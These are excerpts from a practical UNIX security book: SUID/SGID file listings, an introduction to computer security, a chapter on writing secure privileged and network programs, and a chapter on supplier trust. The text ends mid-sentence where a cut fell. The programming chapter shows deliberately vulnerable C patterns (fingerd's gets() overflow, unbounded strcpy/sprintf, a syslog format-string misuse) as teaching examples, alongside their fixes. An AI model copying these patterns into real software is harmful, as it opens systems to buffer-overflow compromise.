--s--s--x 1 uucp daemon 16384 Sep 3 1989 /usr/bin/uuname<br />

--s--s--x 1 uucp daemon 16384 Sep 3 1989 /usr/bin/uusnap<br />

--s--s--x 1 uucp daemon 24576 Sep 3 1989 /usr/bin/uupoll<br />

--s--s--x 1 uucp daemon 16384 Sep 3 1989 /usr/bin/uuq<br />

--s--s--x 2 uucp daemon 16384 Sep 3 1989 /usr/bin/uusend<br />

--s--s--x 2 uucp daemon 16384 Sep 3 1989 /usr/bin/ruusend<br />

--s--s--x 1 uucp daemon 90112 Sep 3 1989 /usr/lib/uucp/uucico<br />

--s--s--x 1 uucp daemon 24576 Sep 3 1989 /usr/lib/uucp/uuclean<br />

--s--s--- 1 uucp daemon 32768 Sep 3 1989 /usr/lib/uucp/uuxqt<br />

--s--x--x 1 uucp daemon 32768 Feb 21 1990 /usr/var/uucp/uumonitor<br />

--s--x--x 1 uucp daemon 86016 Feb 21 1990 /usr/var/uucp/uucompact<br />

--s--x--x 1 uucp daemon 77824 Feb 21 1990 /usr/var/uucp/uumkspool<br />

--s------ 1 uucp daemon 90112 Feb 21 1990 /usr/var/uucp/uurespool<br />

These UUCP files are SUID uucp so they can access and modify the protected UUCP directories. Not all of these will be<br />

SUID in every system.<br />

-rwsr-xr-x 1 root system 954120 Jun 8 03:58 /usr/bin/X11/xterm<br />

-rwsr-xr-x 1 root system 155648 Nov 16 1989 /usr/lib/X11/getcons<br />

xterm is SUID because it needs to be able to change the ownership of the pty that it creates for the X terminal. getcons is<br />

SUID because it needs to be able to execute a privileged kernel call.<br />


B.3.2.2 SGID files<br />

-rwxr-sr-x 1 root kmem 4772 Nov 11 17:07 /usr/etc/arp<br />

-rwxr-sr-x 1 root kmem 2456 Nov 11 17:14 /usr/etc/dmesg<br />

-rwxr-sr-x 1 root kmem 4276 Nov 11 17:35 /usr/etc/kgmon<br />

-rwxr-sr-x 1 root kmem 5188 Nov 11 18:16 /usr/etc/vmmprint<br />

-rwxr-sr-x 1 root kmem 3584 Nov 11 18:16 /usr/etc/vmoprint<br />

-rwxr-sr-x 1 root kmem 5520 Nov 11 20:38 /usr/etc/nfsstat<br />

-r-xr-sr-x 1 root kmem 32768 Oct 22 10:30 /usr/ucb/gprof<br />

-rwxr-sr-x 1 root kmem 40960 Nov 11 18:39 /usr/ucb/netstat<br />

-rwxr-sr-x 1 root kmem 24576 Nov 11 18:57 /usr/ucb/sysline<br />

-rwxr-sr-x 1 root kmem 76660 Jun 8 03:56 /usr/bin/X11/xload<br />

These commands are SGID because they need to be able to access the kernel's memory.<br />

-rwxr-sr-x 1 root tty 2756 Nov 11 17:05 /bin/wall<br />

-rwxr-sr-x 1 root tty 4272 Nov 11 17:06 /bin/write<br />

These commands are SGID because they need to be able to access the raw terminal devices.<br />

---s--s--x 1 uucp daemon 90112 Nov 11 20:25 /usr/lib/uucp/uucico<br />

---s--s--x 1 uucp daemon 11136 Nov 11 20:25 /usr/lib/uucp/uuclean<br />

---s--s--- 1 uucp daemon 32768 Nov 11 20:26 /usr/lib/uucp/uuxqt<br />

---s--s--x 1 uucp daemon 24576 Nov 11 20:25 /usr/bin/uucp<br />

---s--s--x 1 uucp daemon 24576 Nov 11 20:25 /usr/bin/uux<br />

---s--s--x 1 uucp daemon 4620 Nov 11 20:25 /usr/bin/uulog<br />

---s--s--x 1 uucp daemon 5776 Nov 11 20:25 /usr/bin/uuname<br />

---s--s--x 1 uucp daemon 4260 Nov 11 20:26 /usr/bin/uusnap<br />

---s--s--x 1 uucp daemon 24576 Nov 11 20:26 /usr/bin/uupoll<br />

---s--s--x 1 uucp daemon 8716 Nov 11 20:26 /usr/bin/uuq<br />

---s--s--x 2 uucp daemon 3548 Nov 11 20:26 /usr/bin/uusend<br />

---s--s--x 2 uucp daemon 3548 Nov 11 20:26 /usr/bin/ruusend<br />

These commands are all SGID because they need to be able to access UUCP spool files.<br />

-rwx--s--x 1 root daemon 24576 Oct 27 18:39 /usr/etc/lpc<br />

-rws--s--x 1 root daemon 40960 Oct 27 18:39 /usr/lib/lpd<br />

-rws--s--x 1 root daemon 24576 Oct 27 18:39 /usr/ucb/lpr<br />

-rws--s--x 1 root daemon 24576 Oct 27 18:39 /usr/ucb/lpq<br />

-rws--s--x 1 root daemon 24576 Oct 27 18:39 /usr/ucb/lprm<br />

These commands are all SGID because they need to be able to access the line-printer device and spool files.<br />

-rwxr-sr-x 1 root operator 6700 Nov 11 16:53 /bin/df<br />

This command is SGID because it needs access to the raw disk device (which is owned by the group operator on some<br />

versions of Berkeley <strong>UNIX</strong>).<br />



[Chapter 1] Introduction<br />

1. Introduction<br />

Contents:<br />

What Is Computer <strong>Sec</strong>urity?<br />

What Is an Operating System?<br />

History of <strong>UNIX</strong><br />

<strong>Sec</strong>urity and <strong>UNIX</strong><br />

Role of This Book<br />

Chapter 1<br />

In today's world of international networks and electronic commerce, every computer system is a potential<br />

target. Rarely does a month go by without news of some major network or organization having its<br />

computers penetrated by unknown computer criminals. Although some computer "hackers" (see the<br />

sidebar below) have said that such intrusions are merely teenage pranks or fun and games, these<br />

intrusions have become more sinister in recent years: computers have been rendered inoperable; records<br />

have been surreptitiously altered; software has been replaced with versions containing secret "back doors";<br />

proprietary information has been copied without authorization; and millions of passwords have been<br />

captured from unsuspecting users.<br />

Even if nothing is removed or altered, system administrators must often spend hours or days reloading<br />

and reconfiguring a compromised system to regain some level of confidence in the system's integrity.<br />

There is no way to know the motives of an intruder and the worst must be assumed. People who break<br />

into systems simply to "look around" do real damage, even if they do not read confidential mail and do<br />

not delete any files. If computer security was once the subject of fun and games, those days have long<br />

since passed.<br />

Many different kinds of people break into computer systems. Some people - perhaps the most widely<br />

publicized - are the equivalent of reckless teenagers out on electronic joy rides. Like youths who<br />

"borrow" fast cars, their main goal isn't necessarily to do damage, but to have what they consider to be a<br />

good time. Others are far more dangerous: some people who compromise system security are sociopaths,<br />

joyriding around the networks bent on inflicting damage on unsuspecting computer systems. Others see<br />

themselves at "war" with rival hackers; woe to innocent users and systems who happen to get in the way<br />

of cyberspace "drive-by shootings!" Still others are out for valuable corporate information, which they<br />

hope to resell for profit. There are also elements of organized crime, spies and saboteurs motivated by<br />

both greed and politics, terrorists, and single-minded anarchists using computers and networks.<br />

Who Is a Computer Hacker?<br />


HACKER noun 1. A person who enjoys learning the details of computer systems and how<br />

to stretch their capabilities - as opposed to most users of computers, who prefer to learn only<br />

the minimum amount necessary. 2. One who programs enthusiastically or who enjoys<br />

programming rather than just theorizing about programming.<br />

Guy L. Steele, et al., The Hacker's Dictionary<br />

There was a time when computer security professionals argued over the term "hacker." Some thought<br />

that hackers were excellent and somewhat compulsive computer programmers, like Richard Stallman,<br />

founder of the Free Software Foundation. Others thought that hackers were computer criminals, more<br />

like convicted felon Mark Abene, a.k.a. "Phiber Optik." Complicating this discussion was the fact that<br />

many computer security professionals had formerly been hackers themselves - of both persuasions. Some<br />

were anxious to get rid of the word, while others wished to preserve it.<br />

Today the confusion over the term hacker has largely been resolved. While some computer professionals<br />

continue to call themselves "hackers," most don't. In the mind of the public, the word "hacker" has been<br />

firmly defined as a person exceptionally talented with computers who often misuses that skill. Use of the<br />

term by members of the news media, law enforcement, and the entertainment industry has only served to<br />

reinforce this definition.<br />

In some cases, we'll refer to people who break into computers, and present a challenge for computer<br />

security, by a variety of names: "crackers," "bad guys," and occasionally "hackers." However, in general,<br />

we will try to avoid these labels and use more descriptive terms: "intruders," "vandals," or simply,<br />

"criminals."<br />

The most dangerous computer criminals are usually insiders (or former insiders), because they know<br />

many of the codes and security measures that are already in place. Consider the case of a former<br />

employee who is out for revenge. The employee probably knows which computers to attack, which files<br />

will cripple the company the most if deleted, what the defenses are, and where the backup tapes are<br />

stored.<br />

Despite the risks, interest in computer networking and the <strong>Internet</strong> has never been greater. The number of<br />

computers attached to the <strong>Internet</strong> has approximately doubled every year for nearly a decade. By all<br />

indications, this growth is likely to continue for several years to come. With this increased interest in the<br />

<strong>Internet</strong>, there has been growing interest in <strong>UNIX</strong> as the operating system of choice for <strong>Internet</strong><br />

gateways, high-end research machines, and advanced instructional platforms.<br />

Years ago, <strong>UNIX</strong> was generally regarded as an operating system that was difficult to secure. This<br />

reputation was partially unfounded. Although part of <strong>UNIX</strong>'s poor reputation came from design flaws<br />

and bugs, a bigger cause for blame rested with the traditional use of <strong>UNIX</strong> and with the poor security<br />

consciousness of its users. For its first 15 years, <strong>UNIX</strong> was used primarily in academia, the computing<br />

research community, the telephone company, and the computer industry itself. In most of these<br />

environments, computer security was not a priority (until perhaps recently). Users in these environments<br />

often configured their systems with lax controls, and even developed philosophies that viewed strong<br />

security as something to avoid. Because they cater to this community (and hire from it), many <strong>UNIX</strong><br />

vendors have developed a culture that has been slow to incorporate more practical security mechanisms<br />

into their products.[1]<br />


[1] James Ellis at CERT suggests that another reason for <strong>UNIX</strong>'s poor security record has to<br />

do with the widespread availability of <strong>UNIX</strong> source code, which allows for detailed<br />

inspection by potential attackers for weaknesses. Buffer overflows or coding errors that<br />

would be reported on other systems as merely causing crashes are reported frequently on<br />

<strong>UNIX</strong> with detailed programs that break system security.<br />

Perhaps the best known demonstration of <strong>UNIX</strong> vulnerability to date occurred in November 1988. That<br />

was when Robert T. Morris released his infamous "<strong>Internet</strong> worm" program, which spread to thousands<br />

of computers in a matter of hours. That event served as a major wake-up call for many <strong>UNIX</strong> users and<br />

vendors. Since then, users, academics, and computer manufacturers have usually worked together to try<br />

to improve the security of the <strong>UNIX</strong> operating system. Many of the results of those efforts are described<br />

in this book.<br />

But despite the increasing awareness and the improvements in defenses, the typical <strong>UNIX</strong> system is still<br />

exposed to many dangers. The purpose of this book is to give readers a fundamental understanding of the<br />

principles of computer security and to show how they apply to the <strong>UNIX</strong> operating system. We hope to<br />

show you practical techniques and tools for making your system as secure as possible, especially if it is<br />

running some version of <strong>UNIX</strong>. Whether you are a user or administrator, we hope that you will find<br />

value in these pages.<br />

1.1 What Is Computer <strong>Sec</strong>urity?<br />

Terms like security, protection, and privacy often have more than one meaning. Even professionals who<br />

work in information security do not agree on exactly what these terms mean. The focus of this book is<br />

not formal definitions and theoretical models so much as practical, useful information. Therefore, we'll<br />

use an operational definition of security and go from there.<br />

Computer <strong>Sec</strong>urity: "A computer is secure if you can depend on it and its software to behave as you<br />

expect."<br />

If you expect the data entered into your machine today to be there in a few weeks, and to remain unread<br />

by anyone who is not supposed to read it, then the machine is secure. This concept is often called trust:<br />

you trust the system to preserve and protect your data.<br />

By this definition, natural disasters and buggy software are as much threats to security as unauthorized<br />

users. This belief is obviously true from a practical standpoint. Whether your data is erased by a vengeful<br />

employee, a random virus, an unexpected bug, or a lightning strike - the data is still gone.<br />

Our practical definition might also imply to some that security is concerned with issues of testing your<br />

software and hardware, and with preventing user mistakes. However, we don't intend our definition to be<br />

that inclusive. That's why the word "practical" is in the title of this book - and why we won't try to be<br />

more specific about defining what "security" is, exactly. A formal definition wouldn't necessarily help<br />

you any more than our working definition, and would require detailed explanations of risk assessment,<br />

asset valuation, policy formation, and a number of other topics beyond what we are able to present here.<br />

On the other hand, knowing something about these concepts is important in the long run. If you don't<br />

know what you're protecting, why you're protecting it, and what you are protecting it from, your task will<br />

be rather difficult! Furthermore, you need to understand how to establish and apply uniform security<br />


policies. Much of that is beyond the scope of what we hope to present here; thus, we'll discuss a few of<br />

these topics in Chapter 2, Policies and Guidelines. We'll also recommend that<br />

you examine some of the references available. Several good introductory texts in this area, including<br />

Computer <strong>Sec</strong>urity Basics (Russell and Gangemi), Computer Crime: A Crimefighter's Handbook (Seger,<br />

VonStorch, and Icove), and Control and <strong>Sec</strong>urity of Computer Information Systems (Fites, Kratz, and<br />

Brebner) are listed in Appendix D, Paper Sources. Other texts, university courses, and professional<br />

organizations can provide you with more background. <strong>Sec</strong>urity isn't a set of tricks, but an ongoing area of<br />

specialization.<br />

This book emphasizes techniques to help keep your system safe from other people - including both<br />

insiders and outsiders, those bent on destruction, and those who are simply ignorant or untrained. The<br />

text does not detail every specific security-related feature that is available only on certain versions of<br />

<strong>UNIX</strong> from specific manufacturers: companies that take the time to develop such software usually<br />

deliver it with sufficient documentation.<br />

Throughout this book, we will be presenting mechanisms and methods of using them. To decide which<br />

mechanisms are right for you, take a look at Chapter 2. Remember, each site must develop its own<br />

overall security policies, and those policies will determine which mechanisms are appropriate to use. End<br />

users should also read Chapter 2 - users should be aware of policy considerations, too.<br />

For example, if your local policy is that all users can build and install programs that can be accessed by<br />

other users, then you may wish to set the file permissions on /usr/local/bin to be mode 1777, which<br />

allows users to add their own files but does not generally allow them to delete files placed there by other<br />

users. If you don't wish to take the risk of allowing users to install publicly accessible programs that<br />

might contain Trojan horses or trap doors,[2] a more appropriate file permissions setting for<br />

/usr/local/bin might be 755.[3]<br />

[2] For an example of such a program, consider a rogue user who installs a program called ls<br />

that occasionally deletes files instead of listing them.<br />

[3] See Chapter 5, The <strong>UNIX</strong> Filesystem, for a discussion of these protection modes.<br />



[Chapter 23] Writing <strong>Sec</strong>ure SUID and Network Programs<br />

Chapter 23<br />

23. Writing <strong>Sec</strong>ure SUID and Network<br />

Programs<br />

Contents:<br />

One Bug Can Ruin Your Whole Day...<br />

Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

Tips on Writing Network Programs<br />

Tips on Writing SUID/SGID Programs<br />

Tips on Using Passwords<br />

Tips on Generating Random Numbers<br />

<strong>UNIX</strong> Pseudo-Random Functions<br />

Picking a Random Seed<br />

A Good Random Seed Generator<br />

With a few minor exceptions, the underlying security model of the <strong>UNIX</strong> operating system - a privileged<br />

kernel, user processes, and the superuser who can perform any system management function - is<br />

fundamentally workable. But if that is the case, then why has <strong>UNIX</strong> had so many security problems in<br />

recent years? The answer is simple: although the <strong>UNIX</strong> security model is basically sound, programmers<br />

are careless. Most security flaws in <strong>UNIX</strong> arise from bugs and design errors in programs that run as root<br />

or with other privileges, as a result of configuration errors, or through the unanticipated interactions<br />

between such programs.<br />

23.1 One Bug Can Ruin Your Whole Day...<br />

The disadvantage of the <strong>UNIX</strong> security model is that it makes a tremendous investment in the infallibility<br />

of the superuser and in the software that runs with the privileges of the superuser. If the superuser<br />

account is compromised, then the system is left wide open. Hence our many admonitions in this book to<br />

protect the superuser account, and to restrict the number of people who must know the password.<br />

Unfortunately, even if you prevent users from logging into the superuser account, many <strong>UNIX</strong> programs<br />

need to run with superuser privileges. These programs are run as SUID root programs, when the system<br />

boots, or as network servers. A single bug in any of these complicated programs can compromise the<br />

safety of your entire system. This characteristic is probably a design flaw, but it is basic to the design of<br />


<strong>UNIX</strong>, and is not likely to change.<br />

23.1.1 The Lesson of the <strong>Internet</strong> Worm<br />

One of the best-known examples of such a flaw was a single line of code in the program /etc/fingerd, the<br />

finger server, exploited in 1988 by Robert T. Morris's <strong>Internet</strong> Worm. fingerd provides finger service<br />

over the network. One of the very first lines of the program reads a single line of text from standard input<br />

containing the name of the user that is to be "fingered."<br />

The original fingerd program contained these lines of code:<br />

char line[512];<br />

line[0] = '\0';<br />

gets(line);<br />

Because the gets() function does not check the length of the line read, a rogue program could supply<br />

more than 512 bytes of valid data, enabling the stack frame of the fingerd server to be overrun. Morris[1]<br />

wrote code that caused fingerd to execute a shell; because fingerd was usually installed to run as the<br />

superuser, the rogue program inherited virtually unrestricted access to the server computer. (fingerd<br />

didn't really need to run as superuser - that was simply the default configuration.)<br />

[1] Or someone else. As noted in Spafford's original analysis of the code (see Appendix D,<br />

Paper Sources), there is some indication that Morris did not write this portion of the Worm<br />

program.<br />

The fix for the finger program was simple: replace the gets() function with the fgets() function, which<br />

does not allow its input buffer length to be exceeded:<br />

fgets(line,sizeof(line),stdin);<br />

Fortunately, the Morris version did not explicitly damage programs or data on computers that it<br />

penetrated.[2] Nevertheless, it illustrated the fact that any network service program can potentially<br />

compromise the system. Furthermore, the flaw was unnoticed in the finger code for more than six years,<br />

from the time of the first Berkeley <strong>UNIX</strong> network software release until the day that the Worm ran loose.<br />

Remember this lesson: because a hole has never been discovered in a program does not mean that no<br />

hole exists.<br />

[2] However, as the worm did run with privileges of the superuser, it could have altered the<br />

compromised system in any number of ways.<br />

Interestingly enough, the fallible human component is illustrated by the same example. Shortly after the<br />

problem with the gets() subroutine was exposed, the Berkeley group went through all of its code and<br />

eliminated every similar use of the gets() call in a network server. Most vendors did the same with their<br />

code. Several people, including one of us, publicly warned that uses of other library calls that wrote to<br />

buffers without bounds checks also needed to be examined. These included calls to the sprintf() routine,<br />

and byte-copy routines such as strcpy().<br />
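
To illustrate the difference (our own sketch, with hypothetical function and buffer names, not code from any vendor's server), the bounded counterparts limit how many bytes each call may write:

#include <stdio.h>
#include <string.h>

void
log_request(const char *user)           /* user may be attacker-supplied */
{
    char name[64];
    char msg[128];

    /* strcpy() and an unbounded %s in sprintf() copy until they reach a
       NUL byte, however far past the end of the buffer that may be. */

    /* Bounded alternatives: strncpy() limits the copy (but may leave the
       result unterminated, so terminate it explicitly), and a precision
       such as %.64s limits how much text sprintf() will insert. */
    strncpy(name, user, sizeof(name) - 1);
    name[sizeof(name) - 1] = '\0';
    sprintf(msg, "finger request from %.64s", name);

    /* ... hand msg to the logging code ... */
}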

In late 1995, as we were finishing the second edition of this book, a new security vulnerability in several<br />


versions of <strong>UNIX</strong> was widely publicized. It was based on buffer overruns in the syslog library routine.<br />

An attacker could carefully craft an argument to a network daemon such that, when an attempt was made<br />

to log it using syslog, the message overran the buffer and compromised the system in a manner<br />

hauntingly similar to the fingerd problem. After seven years, a cousin to the fingerd bug was discovered.<br />

What underlying library calls contribute to the problem? The sprintf() library call does, and so do<br />

byte-copy routines such as strcpy().<br />
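
The defensive habit when handing untrusted text to syslog() is the same (again our sketch, with a hypothetical routine name): keep the format string fixed and bound how much of the caller's data is expanded into it:

#include <syslog.h>

void
log_client_input(const char *buf)       /* buf may be attacker-supplied */
{
    /* Risky: passing buf itself as the format string, or expanding it
       with an unbounded %s, hands control of the message size (and of
       any % sequences in it) to the remote user:
       syslog(LOG_INFO, buf);  */

    /* Safer: a fixed format string and a bounded expansion. */
    syslog(LOG_INFO, "client sent: %.500s", buf);
}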

While poor programming tools and methods are regrettable and lead to many UNIX security bugs, the failure to learn from old mistakes is even more regrettable.

23.1.2 An Empirical Study of the Reliability of <strong>UNIX</strong> Utilities<br />

In December 1990, the Communications of the ACM published an article by Miller, Fredriksen, and So,

entitled "An Empirical Study of the Reliability of <strong>UNIX</strong> Utilities" (Volume 33, issue 12, pp. 32-44). The<br />

paper started almost as a joke: a researcher was logged into a <strong>UNIX</strong> computer from home, and the<br />

programs he was running kept crashing because of line noise from a poor modem connection. Eventually<br />

Barton Miller, a professor at the University of Wisconsin, decided to subject the <strong>UNIX</strong> utility programs<br />

from a variety of different vendors to a selection of random inputs and monitor the results.<br />

23.1.2.1 What they found<br />

The results were discouraging. Between 25% and 33% of the <strong>UNIX</strong> utilities could be crashed or hung by<br />

supplying them with unexpected inputs - sometimes input that was as simple as an end-of-file in the

middle of an input line. On at least one occasion, crashing a program tickled an operating system bug and<br />

caused the entire computer to crash. Many times, programs would freeze for no apparent reason.<br />
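
In the same spirit, random black-box testing can be as little as piping noise into a utility and checking how it exits. The toy driver below is our own sketch, far simpler than the published Fuzz tool, and the target program and byte count are arbitrary choices:

#include <stdio.h>
#include <stdlib.h>
#include <time.h>

int
main(void)
{
    FILE *target;
    long i;
    int status;

    srand((unsigned) time(NULL));

    /* Feed 100,000 random bytes to the target's standard input. */
    target = popen("/usr/bin/sort > /dev/null 2>&1", "w");
    if (target == NULL)
        return 1;
    for (i = 0; i < 100000; i++)
        fputc(rand() & 0xff, target);

    /* A nonzero (or signal-indicating) exit status suggests the utility
       did not cope gracefully with the garbage. */
    status = pclose(target);
    printf("target exit status: %d\n", status);
    return 0;
}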

In 1995 a new team headed by Miller repeated the experiment, this time running a program called Fuzz<br />

on nine different <strong>UNIX</strong> platforms. The team also tested <strong>UNIX</strong> network servers, and a variety of X<br />

Windows applications (both clients and servers).[3] Here are some of the highlights:<br />

● According to the 1995 paper, vendors were still shipping a distressingly buggy set of programs: "...the failure rate of utilities on the commercial versions of UNIX that we tested (from Sun, IBM, SGI, DEC, and NeXT) ranged from 15-43%."

● UNIX vendors don't seem to be overly concerned about bugs in their programs: "Many of the bugs discovered (approximately 40%) and reported in 1990 are still present in their exact form in 1995. The 1990 study was widely published in at least two languages. The code was made freely available via anonymous FTP. The exact random data streams used in our testing were made freely available via FTP. The identification of failures that we found were also made freely available via FTP; these include code fragments with file and line numbers for the errant code. According to our records, over 2000 copies of the...tools and bug identifications were fetched from our FTP sites...It is difficult to understand why a vendor would not partake of a free and easy source of reliability improvements."

● The two lowest failure rates in the study were the Free Software Foundation's GNU utilities (failure rate of 7%) and the utilities included with the freely distributed Linux version of the UNIX operating system (failure rate 9%).[4] Interestingly enough, the Free Software Foundation has strict coding rules that forbid the use of fixed-length buffers. (Miller et al. failed to note that many of the Linux utilities were repackaged GNU utilities.)

[3] You can download a complete copy of the papers from ftp://grilled.cs.wisc.edu/technical_papers/fuzz-revisited.ps.Z.

[4] We don't believe that 7% is an acceptable failure rate, either.

There were a few bright points in the 1995 paper. Most notable was the fact that Miller et al. were unable<br />

to crash any <strong>UNIX</strong> network server. The group was also unable to crash any X Windows server.<br />

On the other hand, the group discovered that many X clients will readily crash when fed random streams<br />

of data. Others will lock up - and in the process, freeze the X server until the programs are terminated.<br />

23.1.2.2 Where's the beef?<br />

Many of the errors that Miller's group discovered result from common programming mistakes with the C<br />

programming language - programmers who wrote clumsy or confusing code that did the wrong things;<br />

programmers who neglected to check for array boundary conditions; and programmers who assumed that

their char variables were unsigned, when in fact they are signed.<br />
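
For instance (a sketch of the kind of mistake meant here, not code from any of the tested utilities), using a plain char as a table index goes wrong on machines where char is signed:

#include <stdio.h>

static int table[256];             /* one entry per possible byte value */

int
lookup(char c)
{
    /* Wrong where char is signed: a byte such as 0xE9 becomes a negative
       index and reads outside the table:
       return table[c];  */

    /* Right: convert to unsigned char before indexing. */
    return table[(unsigned char) c];
}

int
main(void)
{
    char byte = (char) 0xE9;       /* e.g., an accented Latin-1 character */
    printf("%d\n", lookup(byte));
    return 0;
}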

While these errors can certainly cause programs to crash when they are fed random streams of data, they are also exactly the kinds of problems that carefully crafted streams of data can exploit to

achieve malicious results. Think back to the <strong>Internet</strong> Worm: if attacked by the Miller Fuzz program, the<br />

original fingerd program would have crashed. But when presented with the carefully crafted stream that<br />

was present in the Morris Worm, the program gave its attacker a root shell!<br />

What is somewhat frightening about the study is that the tests employed by Miller's group are among the<br />

least comprehensive known to testers - random, black-box testing. Different patterns of input could<br />

possibly cause more programs to fail. Inputs made under different environmental circumstances could<br />

also lead to abnormal behavior. Other testing methods could expose these problems where random<br />

testing, by its very nature, would not.<br />

Miller's group also found that use of several commercially available tools enabled them to discover errors<br />

and perform other tests, including discovery of buffer overruns and related memory errors. These tools<br />

are readily available; however, vendors are apparently not using them.<br />

Why don't vendors care more about quality? Well, according to many of them, they do care, but quality<br />

does not sell. Writing good code and testing it carefully is not a quick or simple task. It requires extra<br />

effort, and extra time. The extra time spent on ensuring quality will result in increased cost. To date, few<br />

customers (possibly including you, gentle reader) have indicated a willingness to pay extra for<br />

better-quality software. Vendors have thus put their efforts into what customers are willing to buy, such<br />

as new features. Although we believe that most vendors could do a better job in this respect (and some<br />

could do a much better job), we must be fair and point the finger at the user population, too.<br />

In some sense, any program you write might fare as well as vendor-supplied software. However, that isn't<br />

good enough if the program is running in a sensitive role and might be abused. Therefore, you must<br />

practice good coding habits, and pay special attention to common trouble spots.<br />




Chapter 27<br />

Who Do You Trust?<br />

27.2 Can You Trust Your Suppliers?<br />

Your computer does something suspicious. You discover that the modification dates on your system<br />

software have changed. It appears that an attacker has broken in, or that some kind of virus is spreading.<br />

So what do you do? You save your files to backup tapes, format your hard disks, and reinstall your<br />

computer's operating system and programs from the original distribution media.<br />

Is this really the right plan? You can never know. Perhaps your problems were the result of a break-in.<br />

But sometimes, the worst is brought to you by the people who sold you your hardware and software in<br />

the first place.<br />

27.2.1 Hardware Bugs<br />

The fact that Intel Pentium processors had a floating-point problem that infrequently resulted in a<br />

significant loss of precision when performing some division operations was revealed to the public in<br />

1994. Not only had Intel officials known about this, but apparently they had decided not to tell their<br />

customers until after there was significant negative public reaction.<br />

Several vendors of disk drives have had problems with their products failing suddenly and<br />

catastrophically, sometimes within days of being placed in use. Other disk drives failed when they were<br />

used with <strong>UNIX</strong>, but not with the vendor's own proprietary operating system. The reason: <strong>UNIX</strong> did not<br />

run the necessary command to map out bad blocks on the media. Yet, these drives were widely bought<br />

for use with the <strong>UNIX</strong> operating system.<br />

Furthermore, there are many cases of effective self-destruct sequences in various kinds of terminals and<br />

computers. For example, Digital's original VT100 terminal had an escape sequence that switched the<br />

terminal from a 60Hz refresh rate to a 50Hz refresh rate, and another escape sequence that switched it<br />

back. By repeatedly sending the two escape sequences to a VT100 terminal, a malicious programmer<br />

could cause the terminal's flyback transformer to burn out - sometimes spectacularly!<br />

A similar sequence of instructions could be used to break the monochrome monitor on the original IBM<br />

PC video display.<br />


27.2.2 Viruses on the Distribution Disk<br />

A few years ago, there was a presumption in the field of computer security that manufacturers who<br />

distributed computer software took the time and due diligence to ensure that their computer programs, if<br />

not free of bugs and defects, were at least free of computer viruses and glaring computer security holes.<br />

Users were warned not to run shareware and not to download programs from bulletin board systems,<br />

because such programs were likely to contain viruses or Trojan horses. Indeed, at least one company,<br />

which manufactured a shareware virus scanning program, made a small fortune telling the world that<br />

everybody else's shareware programs were potentially unsafe.<br />

Time and experience have taught us otherwise.<br />

In recent years, a few viruses have been distributed with shareware, but we have also seen many viruses<br />

distributed in shrink-wrapped programs. The viruses come from small companies, and from the makers<br />

of major computer systems. Even Microsoft distributed a CD-ROM with a virus hidden inside a macro<br />

for Microsoft Word. The Bureau of the Census distributed a CD-ROM with a virus on it. One of the<br />

problems posed by viruses on distribution disks is that many installation procedures require that the user<br />

disable any antiviral software that is running.<br />

The mass-market software industry has also seen a problem with logic bombs and Trojan horses. For<br />

example, in 1994, Adobe distributed a version of a new Photoshop 3.0 for the Macintosh with a "time<br />

bomb" designed to make the program stop working at some point in the future; the time bomb had<br />

inadvertently been left in the program from the beta-testing cycle. Because commercial software is not<br />

distributed in source code form, you cannot inspect a program and tell if this kind of intentional bug is<br />

present or not.<br />

Like shrink-wrapped programs, shareware is also a mixed bag. Some shareware sites have system<br />

administrators who are very conscientious, and who go to great pains to scan their software libraries with<br />

viral scanners before making them available for download. Other sites have no controls, and allow users<br />

to place files directly in the download libraries. In the spring of 1995, a program called PKZIP30.EXE<br />

made its way around a variety of FTP sites on the <strong>Internet</strong> and through America Online. This program<br />

appeared to be the 3.0 beta release of PKZIP, a popular DOS compression utility. But when the program<br />

was run, it erased the user's hard disk.<br />

27.2.3 Buggy Software<br />

Consider the following, rather typical, disclaimer on a piece of distributed software:<br />

NO WARRANTY OF PERFORMANCE. THE PROGRAM AND ITS ASSOCIATED<br />

DOCUMENTATION ARE LICENSED "AS IS" WITHOUT WARRANTY AS TO THEIR<br />

PERFORMANCE, MERCHANTABILITY, OR FITNESS FOR ANY PARTICULAR<br />

PURPOSE. THE ENTIRE RISK AS TO THE RESULTS AND PERFORMANCE OF THE<br />

PROGRAM IS ASSUMED BY YOU AND YOUR DISTRIBUTEES. SHOULD THE<br />

PROGRAM PROVE DEFECTIVE, YOU AND YOUR DISTRIBUTEES (AND NOT THE<br />

VENDOR) ASSUME THE ENTIRE COST OF ALL NECESSARY SERVICING,<br />

REPAIR, OR CORRECTION.<br />

Software sometimes has bugs. You install it on your disk, and under certain circumstances, it damages<br />


your files or returns incorrect results. The examples are legion. You may think that the software is<br />

infected with a virus - it is certainly behaving as if it is infected with a virus - but the problem is merely<br />

the result of poor programming.<br />

If the creators and vendors of the software don't have confidence in their own software, why should you?<br />

If the vendors disclaim "...warranty as to [its] performance, merchantability, or fitness for any particular<br />

purpose," then why are you paying them money and using their software as a base for your business?<br />

Unfortunately, quality is not a priority for most software vendors. In most cases, they license the<br />

software to you with a broad disclaimer of warranty (similar to the above) so there is little incentive for<br />

them to be sure that every bug has been eradicated before they go to market. The attitude is often one of<br />

"We'll fix it in the next release, after the customers have found all the bugs." Then they introduce new<br />

features with new bugs. Yet people wait in line at midnight to be the first to buy software that is full of<br />

bugs and may erase their disks when they try to install it.<br />

Other bugs abound. Recall that the first study by Professor Barton Miller, cited in Chapter 23, Writing<br />

<strong>Sec</strong>ure SUID and Network Programs, found that more than one-third of common programs supplied by<br />

several <strong>UNIX</strong> vendors crashed or hung when they were tested with a trivial program that generated<br />

random input. Five years later, he reran the tests. The results? Although most vendors had improved to<br />

where "only" one-fourth of the programs crashed, one vendor's software exhibited a 46% failure rate!<br />

This failure rate was despite wide circulation and publication of the report, and despite the fact that<br />

Miller's team made the test code available for free to vendors.<br />

Most frightening, the testing performed by Miller's group is one of the simplest, least-effective forms of<br />

testing that can be performed (random, black-box testing). Do vendors do any reasonable testing at all?<br />

Consider the case of a software engineer from a major PC software vendor who came to Purdue to recruit<br />

in 1995. During his presentation, students reported that he stated that two of the top 10 reasons to work<br />

for his company were "You don't need to bother with that software engineering stuff - you simply need to<br />

love to code" and "You'd rather write assembly code than test software." As you might expect, the<br />

company has developed a reputation for quality problems. What is surprising is that they continue to be a<br />

market leader, year after year, and that people continue to buy their software.[3]<br />

[3] The same company introduced a product that responded to a wrong password being<br />

typed three times in a row by prompting the user with something to the effect of, "You<br />

appear to have set your password to something too difficult to remember. Would you like to<br />

set it to something simpler?" Analysis of this approach is left as an exercise for the reader.<br />

What's your vendor's policy about testing and good software engineering practices?<br />

Or, consider the case of someone who implements security features without really understanding the "big<br />

